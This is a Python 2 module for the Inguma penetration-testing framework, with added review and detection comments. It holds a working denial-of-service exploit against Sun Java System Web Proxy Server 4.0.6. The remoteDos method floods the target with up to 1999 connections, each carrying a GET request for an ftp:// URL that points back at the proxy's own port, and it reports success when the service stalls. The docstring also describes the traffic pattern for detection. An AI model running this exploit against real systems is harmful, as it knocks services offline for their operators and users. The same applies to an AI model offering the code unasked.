#!/usr/bin/python

##      CSunJavaProxyDos.py
#       
#       Copyright 2010 Joxean Koret <joxeankoret@yahoo.es>
#       
#       This program is free software; you can redistribute it and/or modify
#       it under the terms of the GNU General Public License as published by
#       the Free Software Foundation; either version 2 of the License, or
#       (at your option) any later version.
#       
#       This program is distributed in the hope that it will be useful,
#       but WITHOUT ANY WARRANTY; without even the implied warranty of
#       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#       GNU General Public License for more details.
#       
#       You should have received a copy of the GNU General Public License
#       along with this program; if not, write to the Free Software
#       Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
#       MA 02110-1301, USA.

import sys
import time
import socket

from lib.libexploit import CIngumaModule

# NOTE: this string follows the imports, so Python evaluates it as a plain
# expression statement; it is not the module docstring.
"""
Tested against Sun Java System Web Proxy Server 4.0.6 B09/05/2007
"""

# Module-level metadata describing this module. Presumably read by the
# framework that provides CIngumaModule -- confirm against the loader.
name = "sunproxydos"
brief_description = "Sun Java System Web Proxy DOS"
# NOTE(review): `type` rebinds the builtin of the same name inside this
# module; it is left as is because it looks like part of the metadata
# interface -- confirm before renaming.
type = "exploit"
# The only affected release named in this file.
affects = ["Sun Java System Web Proxy Server 4.0.6"]
description = """
Sun Java System Web Proxy Server is vulnerable to a remote 
denial of service condition while handling ftp queries that points
to itself, i.e., the proxy's address.

Obviously, it's a brute dos exploit.
"""
# Only the word "Fixed" is recorded: this file names neither the fixed
# release nor an advisory, so the patched version has to be taken from the
# vendor's advisory.
patch = "Fixed"
category = "dos"
discoverer = "Joxean Koret"
author = "Joxean Koret <joxeankoret@yahoo.es>"

class CSunJavaProxyDos(CIngumaModule):
    """Denial-of-service check for Sun Java System Web Proxy Server.

    remoteDos() opens up to 1999 short-lived TCP connections to
    target:port and sends, on each one, a single HTTP/1.0 GET for an
    ftp:// URL whose host is the literal string "localhost" and whose port
    is the proxy port. It reports success when one iteration takes longer
    than 5 seconds, or when a socket timeout occurs after more than 50
    connections.

    For detection: the traffic visible in this code is a rapid run of
    connections to the proxy port, each carrying the request line
    "GET ftp://user:pass@localhost:<port> HTTP/1.0" and closed without
    reading a response. A proxy request whose ftp:// authority is the
    proxy's own listener is the pattern to alert on or reject.
    """

    target = ""  # Host to connect to; run() substitutes "localhost" when empty
    port = 8080  # TCP port of the proxy; also written into the ftp:// URL
    # The attributes below are not read anywhere in this class; presumably
    # CIngumaModule or the surrounding framework uses them -- confirm.
    waitTime = 0
    # NOTE: not used by remoteDos(), which installs its own 10-second default.
    timeout = 1
    exploitType = 1
    # NOTE(review): these class-level dicts are shared by every instance
    # unless an instance rebinds them.
    services = {}
    results = {}
    dict = None
    interactive = True

    def help(self):
        """Print the two settings this module reads: target and port."""
        print "target = <target host>"
        print "port = <port>"

    def run(self):
        """Fill in the default target and port, then start the check.

        An empty or None target becomes "localhost"; a port of 0 or None
        becomes 8080. The result of remoteDos() is not passed on, so this
        method returns None whatever the outcome.
        """
        if self.target == "" or self.target == None:
            self.target = "localhost"
        
        if self.port == 0 or self.port == None:
            self.port = 8080
        
        self.remoteDos()

    def remoteDos(self):
        """Send the self-referencing ftp:// requests and watch for a stall.

        Returns:
            True when the stall heuristic fires (one iteration took longer
            than 5 seconds, or a socket timeout after more than 50
            connections); False when interrupted from the keyboard; None
            when all 1999 requests complete without either signal.

        Raises:
            socket.timeout: re-raised when the timeout happens within the
                first 50 connections.

        Only KeyboardInterrupt and socket.timeout are handled; any other
        socket error (a refused connection, for example) propagates to the
        caller.
        """
        # NOTE(review): this is a process-wide default. Every socket created
        # later in this interpreter without its own timeout inherits these
        # 10 seconds, not only the sockets opened below.
        socket.setdefaulttimeout(10)

        try:
            print "[+] Launching attack against %s:%d" % (self.target, self.port)

            aTime = time.time()
            # range(1, 2000) gives at most 1999 connections. Author's note:
            # commonly, 1035 queries are sufficient.
            for i in range(1,2000):
                    # aTime was stamped at the start of the previous
                    # iteration, so this measures how long the previous
                    # connect/send/close took. It is a timing heuristic: a
                    # slow path to the target also exceeds 5 seconds, so a
                    # positive result needs confirming on the server side.
                    if time.time() - aTime > 5:
                        print
                        print "[+] Exploit works!"
                        return True

                    aTime = time.time()
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    s.connect((self.target, self.port))
                    # The URL host is the fixed string "localhost", not
                    # self.target; only the port comes from the instance.
                    # Per the module description, the request is meant to
                    # point the proxy at its own address.
                    s.send("GET ftp://user:pass@localhost:%s HTTP/1.0\r\n\r\n" % int(self.port))
                    # Closed without reading any response.
                    # NOTE(review): if connect() or send() raises, this
                    # close is skipped and the socket is left to garbage
                    # collection.
                    s.close()
                    # Backspaces overwrite the previous counter on the
                    # same terminal line.
                    sys.stdout.write("\b"*20 + "--> Connection #%d" % i)
                    sys.stdout.flush()
        except KeyboardInterrupt:
            print
            print "Aborted."

            return False
        except socket.timeout:
            # Treated as a denial-of-service condition only from the 51st
            # connection on (i > 50); an earlier timeout is re-raised. Any
            # other reason for a timeout after that point is reported as
            # success too.
            if i > 50:
                print
                print "[+] Exploit works!"
                return True
            else:
                raise

    def printSummary(self):
        """Do nothing; this module prints no summary."""
        pass
